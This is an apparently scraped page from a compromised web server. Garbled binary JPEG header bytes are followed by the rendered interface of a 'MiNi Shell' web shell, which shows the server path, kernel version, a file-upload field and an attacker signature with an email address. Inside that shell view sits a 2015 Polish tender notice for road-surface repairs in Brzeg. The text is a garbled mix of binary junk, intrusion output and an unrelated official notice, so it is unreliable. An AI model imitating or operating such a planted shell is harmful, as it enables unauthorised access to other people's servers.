JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150324/65276-N-2015.html

<p class="kh_header"><b>Brzeg: REMONT CZĄSTKOWY NAWIERZCHNI JEZDNI DRÓG POWIATOWYCH W TECHNOLOGII GRYSAMI NA SUCHO I MASĄ NA GORĄCO</b><br>
<b>Numer ogłoszenia: 65276 - 2015; data zamieszczenia: 24.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Brzegu , ul. Wyszyńskiego 23, 49-300 Brzeg, woj. opolskie, tel. 077 4113840, faks 077 4113845.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdpbrzeg.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT CZĄSTKOWY NAWIERZCHNI JEZDNI DRÓG POWIATOWYCH W TECHNOLOGII GRYSAMI NA SUCHO I MASĄ NA GORĄCO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu cząstkowego nawierzchni jezdni  dróg powiatowych na terenie Powiatu Brzeskiego w technologii grysami na sucho:
         w orientacyjnej ilości 640,00 ton przy średniej grubości 2 cm i masą na gorąco  
         w orientacyjnej w ilości  350,00 ton przy średniej grubości  4 cm.
        Grysami na sucho przy użyciu remontera wyposażonego w dwa zbiorniki
                     na dwie różne frakcje kruszywa 
                     Remont obejmuje wypełnienie ubytków w jezdni z zastosowaniem emulsji             
                     asfaltowych kationowych szybkorozpadowych niemodyfikowanych K1-65
                     i K1-70 i grysów  bazaltowych zgodnie wymaganiami Specyfikacji  
                     Technicznych  . 
                     Podstawowe wymagania dotyczące wykonania zamówienia:
                     1)gruntowe oczyszczenie uszkodzenia z kurzu, luźnej ziemi i błota,
                     2)natrysk emulsji
                     3)uzupełnienie ubytku : 
                         - wypełnienie mieszanką z ziarnem nośnym gr.5-8mm lub 8-11 mm
                           do ok.20 mm  poniżej ostatecznej płaszczyzny wraz z zagęszczeniem przy   
                           użyciu sprężonego powietrza,
                         - wypełnienie warstwy ścieralnej mieszanka z ziarnem gr.2-5 mm, 
                         - posypanie warstwy ścieralnej czystym grysem.
                      Nie dopuszcza się wykonywania robót podczas opadów atmosferycznych
                      i temp. otoczenia poniżej +10 o C oraz temp. remontowanej nawierzchni niższej                      
                      niż +5o C   
 Masą na gorąco polegający na wbudowaniu na gorąco warstwy mieszanki  
                     mineralno- bitumicznej-betonu asfaltowego  w-wy  wiążącej i ścieralnej 
                     wytworzonej w Wytwórni Mas Bitumicznych po uprzednim obcięciu krawędzi 
                     mechanicznie, oczyszczeniu z resztek i pyłów, posmarowaniu oczyszczonej 
                     powierzchni emulsją kationową i zamknięciem spoin.   
                     Wykonanie robót zgodnie ze  Specyfikacjami  Technicznymi, który stanowi 
                     załącznik do siwz. 
     Prace remontowe należy prowadzić tylko w sprzyjających warunkach  
                    atmosferycznych. Ilość robót może ulec zmianie. Zamawiający zastrzega sobie 
                    prawo do ograniczenia zakresu robót. Wykaz dróg przewidzianych do remontu   
                    zawiera załącznik nr 12 do siwz ,który także może ulec zmianie. Rozliczenie  
                    nastąpi za ilość rzeczywiście wykonanych robót wg cen jednostkowych podanych      
                    w kosztorysie ofertowym. 
                    Zakres robót będzie regulowany przez Zamawiającego stosownie do potrzeb 
                    remontowych w terenie. Zamawiający będzie zlecał pisemnie Wykonawcy  robót 
                    zakres robót do wykonania  w danym miesiącu rozliczeniowym .
                    Odbiór robót będzie następował po upływie każdego m-ca kalendarzowego.   
                    Zamawiający w terminie  do 7dni od daty uzyskania informacji o gotowości          
                    Wykonawcy do odbioru, wyznacza  termin odbioru przedmiotu umowy 
                    zawiadamiając o tym Wykonawcę.  Wykonawca w sposób szczególny jest  
                    zobowiązany do przestrzegania zasad bezpieczeństwa ruchu drogowego 
                    w czasie prowadzenia robót tj.:
                    - stosownego oznakowania sprzętu wykonującego remont,
                    - wyposażenia swoich pracowników kamizelki ostrzegawcze.
                    Wykonawca  jest odpowiedzialny i ponosi wszelkie koszty z tytułu strat   
                     materialnych  powstałych w związku z zaistnieniem zdarzeń losowych i z tytułu 
                     odpowiedzialności cywilnej za szkody oraz następstwa nieszczęśliwych 
                     wypadków dotyczących  pracowników i osób trzecich - powstałe w związku
                     z prowadzonymi pracami.
                     Wszystkie stosowane do remontu materiały powinny posiadać deklaracje lub   
                     certyfikat zgodności z Polska Normą (dla materiałów, dla których nie 
                     ustanowiono  Polskiej  Normy - deklarację lub certyfikat zgodności z Aprobatą  
                     Techniczną .   
W ramach  zamówienia wykonawca zobowiązany jest również do:
         1)opracowania uproszczonego projektu zmiany organizacji ruchu drogowego na czas      
            prowadzonych robót  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia
            23 września 2003r. w sprawie szczegółowych warunków zarządzania ruchem
            na drogach oraz wykonywania nadzoru nad  tym zarządzaniem (Dz.U. Nr 177,       
            poz.1729 z późn. zm.) zatwierdzony przez organ  zarządzający ruchem na drogach   
            powiatowych  oraz jego utrzymania w trakcie prowadzonych robót w należytym stanie    
            technicznym i estetycznym, 
         2)wykonania robót zgodnie z załączonymi specyfikacjami technicznymi, polskimi 
            normami przenoszącymi normy europejskie lub innymi normami   
Zaleca się , aby wykonawca dokonał wizji lokalnej terenu, którego dotyczy zamówienie    
         oraz zdobył wszelkie informacje niezbędne do przygotowania oferty i podpisania     
         umowy.
Utylizacja odpadów. W trakcie wykonywania robót należy przestrzegać Ustawy z dnia  
         14 grudnia  2012r. o odpadach i rozporządzenia  Ministra Środowiska z dnia 27 
         września 2001r. w sprawie katalogu odpadów.    
Na wykonane roboty Wykonawca udzieli gwarancji  jakości na okres min. 12 miesięcy 
         od daty odbioru końcowego. 
         Okres gwarancji stanowi jedno z kryteriów oceny ofert:
          - minimalny wymagany okres gwarancji jakości wynosi  12 m-cy 
          - maksymalny deklarowany okres  gwarancji  jakości wynosi 24 m-ce..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dopuszcza się możliwość udzielenia zamówień uzupełniających polegających 
        na powtórzeniu tego samego rodzaju zamówień,  nie więcej niż  50% wartości  
        zamówienia   podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykonawca musi  wykazać, że  posiada doświadczenie polegające 
                                na wykonaniu (zakończeniu) w okresie ostatnich pięciu lat przed 
                                upływem terminu składania ofert, a jeżeli okres prowadzenia działalności 
                                jest krótszy - w tym okresie, co najmniej dwie roboty budowlane 
                                 w zakresie remontów cząstkowych nawierzchni jezdni dróg publicznych 
                                w tym:
                                -  grysami na sucho -  nie mniej niż   500,00 ton, 
                                -  masą na gorąco    -  nie mniej niż   200,00 ton
                                o wartości  brutto nie mniejszej niż 100 000,00  PLN - każda (słownie:  
                                sto tysięcy złotych  00/100),
                             2)jeżeli wykonawca będzie wykazywał  poleganie na doświadczeniu 
                                innego podmiotu z art.26 ust.2b ustawy Pzp - to musi wykazać 
                                min. 2 roboty budowlane  jak  w § 5.2.1. pkt.1 siwz
                             Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                             złożonych oświadczeń, dokumentów  na zasadzie  spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada opłaconą polisę ubezpieczeniową, 
                               a w przypadku jej braku inny dokument potwierdzający, że wykonawca   
                               jest ubezpieczony  od odpowiedzialności cywilnej na kwotę nie niższą niż 
                               500 000,00 zł, (słownie:  pięćset tysięcy złotych  00/100)  w  zakresie  
                               prowadzonej działalności związanej z przedmiotem zamówienia.    
                               Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                               złożonych oświadczeń,dokumentów  na zasadzie  spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)OFERTA - wg załączonego wzoru do wypełnienia - zał. nr 1,
           2)KOSZTORYS OFERTOWY - wg załączonego wzoru do wypełnienia- zał. nr 2,
  3)zaakceptowany WZÓR  UMOWY - zał. nr 3,
  4)zaakceptowana KARTA GWARANCYYJNA- zał. nr 4,
           5)druk  dotyczący podwykonawstwa zał. nr  10,
           6)pełnomocnictwo do podpisywania oferty, reprezentacji o ile prawo do podpisywania, 
              reprezentacji nie wynika z innych dokumentów,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - gwarancja - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)wydłużenia okresu gwarancji o dowolny okres,
             2)zmiany stawki podatku VAT,
             3)wydłużenia terminu wykonania robót,
Rozliczenie nastąpi za rzeczywistą ilość wykonanych robót.Wynagrodzenie Wykonawcy stanowić
    będzie wynik iloczynu ilości wykonanych robót i ceny jednostkowej podanej w kosztorysie 
    ofertowym.
4)Ilość robót może ulec zmianie. Zamawiający zastrzega także prawo do ograniczenia zakresu robót.

  5)wystąpienia wnioskiem do Zamawiającego o wyrażenie zgody na powierzenie 
                Podwykonawcy części zamówienia, pomimo zobowiązania w ofercie wykonania
                zamówienia bez podwykonawców.  
   Zmiana umowy może nastąpić na pisemny umotywowany wniosek Wykonawcy 
              za zgodą Zamawiającego na podstawie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdpbrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Brzegu 49-300 Brzeg, ul. Wyszyńskiego 23
pokój nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2015 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Brzegu 49-300 Brzeg, ul. Wyszyńskiego 23
pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com